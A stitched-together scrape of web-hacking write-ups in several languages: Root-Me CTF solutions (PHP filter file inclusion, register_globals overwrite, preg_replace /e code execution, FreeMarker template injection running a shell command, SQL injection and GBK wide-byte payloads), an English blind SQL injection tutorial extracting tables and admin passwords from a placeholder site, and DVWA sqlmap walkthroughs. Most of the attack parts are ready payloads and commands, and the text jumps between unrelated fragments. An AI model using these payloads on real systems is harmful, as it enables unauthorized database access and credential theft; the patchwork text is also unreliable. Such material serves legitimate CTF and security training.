Sql injection blind root me solution

Cannot retrieve contributors at this time

15. File upload — null byte

16. PHP filters

25. SQL injection — authentication — GBK

26. SQL injection — string

31. SQL injection — numeric

34. XPath injection — authentication

#Nội dung

##15. File upload — null byte

/index.php?inc=php://filter/convert.base64-encode/resource=index.php
/index.php?inc=php://filter/convert.base64-encode/resource=ch12.php
/index.php?inc=php://filter/convert.base64-encode/resource=config.php

[-] i is index of subtring, j in decimal-unicode

Содержание

CTF. Web. Задания с Root-Me, часть #27.
Предыдущие задания из данной категории вы можете найти на канале.
Задание.
PHP filters
21.PHP register globals
22.File upload — ZIP
Local File Inclusion — Double encoding
26.PHP — Loose Comparison
27.PHP preg_replace()
28.PHP type juggling
29.Remote File Inclusion
30.Server-side Template Injection
31.SQL injection — authentication
32.SQL injection — authentication — GBK
33.SQL injection — string

CTF. Web. Задания с Root-Me, часть #27.

https://t.me/hacker_sanctuary

Данный пост будет носить практический характер. В нём мы решим очередное задание на эксплуатацию уязвимостей веб-приложений в контексте заданий CTF.

Задания будут взяты с известного сайта с различными задачами (CTF и не только) — https://www.root-me.org/

Будем решать задачи из категории: Web — Server

Прямая ссылка: https://www.root-me.org/en/Challenges/Web-Server/

Предыдущие задания из данной категории вы можете найти на канале.

Часть 1 — ссылка

Часть 2 — ссылка

Часть 3 — ссылка

Часть 4 — ссылка

Часть 5 — ссылка

Часть 6 — ссылка

Часть 7 — ссылка

Часть 8 — ссылка

Часть 9 — ссылка

Часть 10 — ссылка

Часть 11 — ссылка

Часть 12 — ссылка

Часть 13 — ссылка

Часть 14 — ссылка

Часть 15 — ссылка

Часть 16 — ссылка

Часть 17 — ссылка

Часть 18 — ссылка

Часть 19 — ссылка

Часть 20 — ссылка

Часть 21 — ссылка

Часть 22 — ссылка

Часть 23 — ссылка

Часть 24 — ссылка

Часть 25 — ссылка

Часть 26 — ссылка

Задание.

Сегодня разберём задачу «SQL injection — authentication — GBK».

В прошлом посту по решению веба с root-me мы разбирали SQLi в аутентификации, сегодня задание аналогичное, но есть некоторое добавление в названии «GBK», а также вопрос «Вы говорите по китайский?» в качестве описания к заданию.

Перейдём по ссылке на задание и посмотрим, что нам предлагают.

Давайте разберёмся, что означает GBK?

А вот что — ссылка.

Это вид кодировки данных. Таким образом мы можем предположить что у нас SQLi связанная с мультибайтовой кодировкой. Про этот вид SQLi вы можете прочитать в довольно старой заметке известного (в узких и не очень кругах) хакера — ссылка.

Теперь нам надо найти таблицу символов GBK и посмотреть какой символ оканчивается на 0x5c (ASCII код обратного слеша).

Поиски много времени не занимают. Попробуем передать символы.

И посмотрим, что нам ответит сервер.

Отлично, мы получили флаг. Задание решено.

PHP filters

http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php
http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php
21.PHP register globals
[+]URL:http://challenge01.root-me.org/web-serveur/ch17/
[+]Statement:似乎开发者经常把备份文件留下…
[+]Solution:根据提示，下载到文件index.php.bak,分析源码。根据测试判断该服务器开启了register_globals，因此存在变量覆盖漏洞。根据源码的逻辑，有两种解题思路，一种是直接覆盖session[logged],另一种方法，覆盖password和hidden_password，接着使用这个Cookie，就可以获得flag
[+]Payload:
_SESSION[logged]=1
password=1&hidden_password=1
22.File upload — ZIP
[+]URL:http://challenge01.root-me.org/web-serveur/ch51/
[+]Statement:读index.php文件1qqq
[+]Solution:目标是要读到index.php的内容。网站的文件上传功能只能上传.zip文件，上传完成后，服务器会解压缩，解压缩后的文件可以访问。但问题是上传的文件只有txt/jpg可以访问。因此构造命令如下，创建一个符号链接。

Local File Inclusion — Double encoding

php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dcv
php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dconf
26.PHP — Loose Comparison
[+]URL:http://challenge01.root-me.org/web-serveur/ch55/
[+]Solution:页面可以查看源码。代码的逻辑是传入两个字母和数字组成的字符串，第一个字符串和一个随机数拼接，要求和第二个参数的md5值相等。题目使用==来判断。==在两者的类型不同时先转换类型为相同再比较，如果有数字类型的就会按数字类型转换。根据题目构造payload，即可获得flag
[+]Payload:s=0e242&h=240610708&submit=Check
27.PHP preg_replace()
[+]URL:http://challenge01.root-me.org/web-serveur/ch37/index.php
[+]Statement:读flag.php
[+]Solution:经过测试发现页面的三个输入点分别对应preg_replace的三个参数，利用preg_replace在第一个参数有/e的标示下，当满足匹配时会把第二个参数当作代码执行，因此构造payload可以读文件
[+]Payload:search=/a/e&replace=file_get_contents(‘flag.php’)&content=a
28.PHP type juggling
[+]URL:http://challenge01.root-me.org/web-serveur/ch44/
[+]Solution:可以看到源码，页面的逻辑是需要满足$auth[‘data’][‘login’]
== $USER &&
!strcmp($auth[‘data’][‘password’]。同样是两个弱类型比较，第一个只需要满足值为0或者为true，即可绕过，strcmp需要使传入的参数为不含有字母的数组，即可绕过。
[+]Payload:auth=%7B%22data%22%3A%7B%22login%22%3A0%2C%22password%22%3A[122]%7D%7D
29.Remote File Inclusion
[+]URL:http://challenge01.root-me.org/web-serveur/ch13/
[+]Statement:获取PHP源代码
[+]Solution:测试发现有文件包含，且开启了allow_url_fopen和allow_url_include，即可以实现远程文件包含。由于在代码执行时，用户的参数被加上了后缀，使用php://input或者是file://….不太好用，因此选择使用data:text/plain,<?php
… ?>进行文件包含，可以读到源码
[+]Payload:?lang=data:text/plain,<?php echo file_get_contents(‘index.php’); ?>
30.Server-side Template Injection
[+]URL:http://challenge01.root-me.org/web-serveur/ch41/
[+]Statement:JAVA EE。利用漏洞获得SECRET_FLAG.txt中的密码。
[+]Solution:根据提示，得知服务器使用的中间件为JAVAEE，查询资料得知FreeMarker为java下最受欢迎的模版引擎，利用其格式在输入点输入${3*3}，发现被渲染成了9。利用FreeMarker的一个可以用来执行命令的类构造出如下payload，即可查看flag内容。
[+]Payload:nickname=<#assign ex=”freemarker.template.utility.Execute”?new()> ${ ex(“cat SECRET_FLAG.txt”) }
31.SQL injection — authentication
[+]URL:http://challenge01.root-me.org/web-serveur/ch9/
[+]Statement:获取管理员的密码
[+]Solution:无任何过滤的注入，通过order by参数可以控制登录的用户，审查元素获得密码
[+]Payload:login=123#&password=1’ or ‘1’=’1’ order by 1 –+
32.SQL injection — authentication — GBK
[+]URL:http://challenge01.root-me.org/web-serveur/ch42/
[+]Statement:获取管理员的密码
[+]Solution:根据题目判断是宽字节注入，所以利用%df逃逸PHP函数的转译。
[+]Payload:login=%bf’ or 1=1 – -&password=abc
33.SQL injection — string
[+]URL:http://challenge01.root-me.org/web-serveur/ch19/
[+]Statment:获取管理员密码
[+]Solution:测试网页，发现在action=recherche页面可以使用union函数注入，并且有回显。一步步构造Payload获取管理员密码
[+]Payload:

I hope You Enjoyed reading Basic Injection, in this tutorial we will learn how we extract data from an application where there is no output and no error ` the database.

Blind SQL Injection is used when there is No Output and No Error from the web application, that means we cant inject the Union based injection in which we use to get the output nor we can Inject the XPATH or Sub Query Injection which use to get the output in form of Error. While doing a Blind injection we make Queries from the database and ask if we are right or wrong.

Lets us start from Testing the Website.

www.vuln-web.com/photo.php?id=1/No Error Website Loaded Normally
www.vuln-web.com/photo.php?id=1'No Error and Website Loaded Normally
www.vuln-web.com/photo.php?id=1'No Error But we found a small change in the Website which is diffrent from others.

As we din’t got the Error let us start the Blind SQL injection. Our next task is to try Commenting out the rest of Query part using out Comment Types.

www.vuln-web.com/photo.php?id=1'--No Error but The Small change is still there
www.vuln-web.com/photo.php?id=1'%23No Error & even that change is not there
www.vuln-web.com/photo.php?id=1'/*No Error but The Small change is still there
www.vuln-web.com/photo.php?id=1'-- No Error but The Small change is still there

That means we can comment out the Query using ‘#’. So we will continue with this one. Time to test is the Injection is really working fine.

www.vuln-web.com/photo.php?id=1' and true%23Normal Page returned
www.vuln-web.com/photo.php?id=1' and false%23Page din't Load As normally it do as the query din't returned anything.

That is good. we are on the right track now lets start the Blind SQL injection. Why we call it blind as we cant see anything we dont know anything what we do is just keep asking question from the database and get the reply in form of yes (Page loaded Normally) or NO (Page dint Loaded Normally).

There are again Two Ways for Blind SQL injection
1. First for N00bz like me who dont have common sense.
2. Second is for proffesional who have good common sense.

Let us First Discuss the First one.

In this injection we will use two new functions which is ASCII and Substring Function. Programmer or many others may be dont need any explaination about this. But for those who need explaination on them.

Ascii(‘a’) will return 97 which is the Ascii value of a. So that means we can get the ascii value of any character passed to this function.

substring(‘n00b’,1,1) will return n.
substring(‘n00b’,2,1) will return 0.
substring(‘n00b’,3,1) will return 0.
substring(‘n00b’,4,1) will return b.
substring(‘n00b’,5,1) will return empty.

I hope you understand the usage of both of them so now we will use both of them together.

Ascii(substring(‘n00b’,1,1)) Now the substring function will return n then the ascii will return the Ascii value of n which is 110.

okay using both of these functions will help us quering the database. So lets check the Internal Query part.

Select column_name from table_name where id=’input’ and Ascii(substring(‘n00b’,1,1))>100;

The above query will give the output Sucessfully as its true now when we

Select column_name from table_name where id=’input’ and Ascii(substring(‘n00b’,1,1))>110;

It will return false as 110 is not smaller than 110. So this is how we will inject and query. Let us move to the injection part.

www.vuln-web.com/photo.php?id=1' and Ascii(substring((<your_query_here_which_returns_one_row>),1,1))<any_number_here%23

We can start retrieving the database name. But i suggest we can move the important part first checking if we have something juicy stuff inside, rather than just peeking inside shit.

www.vuln-web.com/photo.php?id=1' and and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97%23

By the above Query we queried if the first character of first table under the current database greater than a. If it returns true (Page loads Normally) then we will increase it and check

www.vuln-web.com/photo.php?id=1' and and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>110%23

By the above Query we queried if the first character of first table under the current database greater than n. If it returns true (Page loads Normally) then we will increase it and check. Let us assume it dint returned true, it returend False (Page dint Loaded Normally). Now we will decrease and check.

www.vuln-web.com/photo.php?id=1' and and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>105%23

Lets assume is retured True. So now we know that the alphabet is between 105 and 110

www.vuln-web.com/photo.php?id=1' and and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=106%23
www.vuln-web.com/photo.php?id=1' and and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=107%23
www.vuln-web.com/photo.php?id=1' and and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=108%23

So this is it. Now we know the first cahracter in this manner we will keep increasing the SubString Second parameter Number. and try to get out the whole table Name. And i really dont feel that i need to by typing the rest of commands to continue this injection. As any one who read rest of the tutorial can figure out the rest of the part.

But actually i dont like this one as its so slow. so i somehow figured out one other injection which can make the Blind injection faster. So lets move to that one. Here the injection struction is like this.

Getting started with the second one

Getting the Database Name:

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%')%23

Okay here in the above query you can understand the basic things as i suppose you read the other tutorials, so the only thing new in this one is ‘dual’ and like statement.

Select username from users where city like '%degora%';
Select city from users where username like 'n00%'
Select city from users where username like '___'
Select username,password wehre city like 'u_t__%'

Now let us start our Injection using this method. So the good thing about this injection we can guess and we can also check any character if exists in that word and after collecting this info we can make some nice guesses by our own.

Let us First check The Number of characters in current Database Name.

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '_____')%23 (we started from 5)
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '______')%23 (Now we chaecked 6)
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '_______')%23 (Now we checked 7)

So now we know it have 7 characters. Now lets check the common characters a,e,i,o,u,s,t,r,h

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%a%')%23
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%e%')%23
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%i%')%23
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%o%')%23
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%u%')%23

And so on.

After collecting this information let us assume we got a,e,d,b,s,_,1
Its the database so we can make a guess it makes the word ‘dbase_1’

to make sure we are correct we can check it out

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() = 'dbase_1')%23

We got the Database name now lets target tables containing any column name which contains the string «pass».

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')%23

We searched for the first table name which contains columns like pass. If the Query returns true that means there is some output. So now we can start guessing out the name after Couting the number of Characters.

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '____')%23
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '_____')%23

So we got 5 characters. Now we can start geussing the characters.

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%a%')%23We checked A
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%s%')%23We checked 'S'
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%d%')%23We Checked 'D'

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like 'users')%23

okay it worked now we will try to get the columns in the same way i will just give the example query. and u can use the same method to get the data. You can even try for common names.

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select column_name from information_schema.columns where table_schema=database() and table_name='users' and column_name like '%username%' limit 0,1) like '%')%23if they return true then you dont have to waste your time in guessing characters.

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select password from users wehre username like '%admin%' limit 0,1) like '%')%23

I hope it helped to understand the internal workring and to understand how to inject Blind sql injection in a web application.

Здравствуйте, дорогие друзья. Продолжаем рассматривать уязвимость DVWA, которая называется SQL-Injection (Blind) на среднем уровне настроек безопасности.

Для начала выставим настройки на уровень «Medium»:

Переходим на вкладку «SQL Injection (Blind)», и видим две кнопки: 1-я – это выбор ID, а вторая – «Submit». Протестируем любой ID:

Для примера, я выбрал ID, который равен 1. После этого нажал кнопку «Submit», и произошел вывод на странице, который значит, что данный ID существует в базе данных (смотрите скриншот выше).

Далее, как и на низком уровне настроек безопасности, я буду использовать sqlmap, и BurpSuite.

Коннектим Burp с браузером:

В браузере, у меня стоит плагин «FoxyProxy», с помощью которого, я могу сконнектить Burp в один клик:

Отлично. Теперь у нас все готово, для перехвата пакетов.

Выбираем любой ID на странице из предложенных, и жмем кнопку «Submit». Нас автоматически перебросит в BurpSuite:

Открываем терминал, и вводим следующую команду: «sqlmap –u “http://dvwa.local/vulnerabilities/sqli_blind/ “ —cookie=”security=medium; PHPSESSID=(значение сессии)” —data=” id=1&Submit=Submit” —tables -D dvwa »:

sqlmap –u “http://dvwa.local/vulnerabilities/sqli_blind/ “ --cookie=”security=medium; PHPSESSID=(значение сессии)” --data=” id=1&Submit=Submit” --tables -D dvwa

Отлично. У нас есть доступ к базе данных «dvwa».

На этом все. Всем хорошего дня!

#1 Уязвимость DVWA. SQL-Injection (уровень Low).

#2 Уязвимость DVWA. Brute Force (Уровень Low).

#3 Уязвимость DVWA — File Upload (Уровень Low).

#4 Уязвимость DVWA. File Upload (Уровень Medium).

#5 Уязвимость DVWA File Upload (Уровень High).

#6 Уязвимость DVWA. Brute Force (Уровень Medium).

#7 Уязвимость DVWA. Command Execution (Уровень Low).

#8 Уязвимость DVWA. Command Execution (Уровень Medium).

#9 Уязвимость DVWA. CSRF (Уровень Low).

#10 Уязвимость DVWA. CSRF (Уровень Medium).

#11. Уязвимость DVWA — (Local File Inclusion). Уровень Low.

#12 Уязвимость DVWA. LFI (Local File Inclution) — Уровень Medium.

#13 Уязвимость DVWA LFI — Local File Inclusion (Уровень High).

#14 Уязвимость DVWA. Command Execution (Уровень High).

#15 Уязвимость DVWA. SQL-Injection (Уровень Medium).

#16 Уязвимость DVWA — Brute Force (Уровень High).

#17 Уязвимость DVWA. SQL-Injection (Уровень High).

#18 Уязвимость DVWA. CSRF (Уровень High).

#19 Уязвимость DVWA. JavaScript — Уровень «Low».

#20 Уязвимость DVWA. JavaScript — уровень «Medium».

#25 Уязвимость DVWA. XSS DOM (Уровень Low).

#26 Уязвимость DVWA. XSS DOM (уровень Medium).

#27 Уязвимость DVWA. XSS DOM — (уровень High).

#28 Уязвимость DVWA. XSS (Reflected) — (уровень Low).

#29 Уязвимость DVWA. XSS (Reflected) — (уровень Medium).

#30 Уязвимость DVWA. XSS (Reflected) — уровень (High).

#31 Уязвимость DVWA. XSS (Stored) — уровень (Low).

#32 Уязвимость DVWA. XSS (Stored) — уровень (Medium).

#33 Уязвимость DVWA. XSS (Stored) — уровень (High).

#34 Уязвимость DVWA. Content Security Policy (Bypass) — Уровень (Low).

#35 Уязвимость DVWA. Content Security Policy (Bypass) — Уровень (Medium).

#36 Уязвимость DVWA. Content Security Policy (Bypass)- Уровень (High).

#37 Уязвимость DVWA. Weak Session IDs — Уровень (Low).

#38 Уязвимость DVWA. Weak Session IDs — Уровень (Medium).

#39 Уязвимость DVWA. Weak Session IDs — Уровень (High).

#40 Уязвимость DVWA. JavaScript. — Уровень (High).

#41 Уязвимость DVWA. SQL-Injection (Blind) — Уровень (Low).

Здравствуйте, дорогие друзья. Продолжаем рассматривать уязвимость DVWA, которая называется SQL-Injection (Blind) на низком уровне настроек безопасности.

Для начала выставим настройки на уровень «Low»:

Переходим на вкладку «SQL-Injection (Blind)», и видим поле для ввода данных:

Попробуем протестировать данное поле, введя цифру 1:

Получаем вывод информации по ID, которую мы вводили. Вывод на странице говорит о том, что данная запись существует в базе данных.

Давайте дальше тестировать, и, в дополнение к цифре 1, добавим кавычку:

Запись отсутствует в базе данных.

Теперь протестируем немного по сложнее конструкцию, которая выглядит как: «1’ or 1=1#»:

Итак, ID существует в базе данных.

Для дальнейшей работы нам понадобится sqlmap, и BurpSuite.

Коннектим Burp с браузером:

Для настройки браузера с Burp, я использую плагин FoxyProxy:

Вводим цифру «1», и нас автоматически перебрасывает в BurpSuite:

Открываем терминал, и вводим следующую команду: «sqlmap –u “http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit “ —cookie=”security=low; PHPSESSID=(значение сессии)” —dbs »:

sqlmap –u “http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit “ --cookie=”security=low; PHPSESSID=(значение сессии)” –D dvwa --tables

В итоге мы получили наименование актуальных баз данных.

Давайте посмотрим содержимое базы «dvwa». Команда останется такая же, за исключением дополнительных параметров: «sqlmap –u “http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit “ —cookie=”security=low; PHPSESSID=(значение сессии)” –D dvwa —tables»: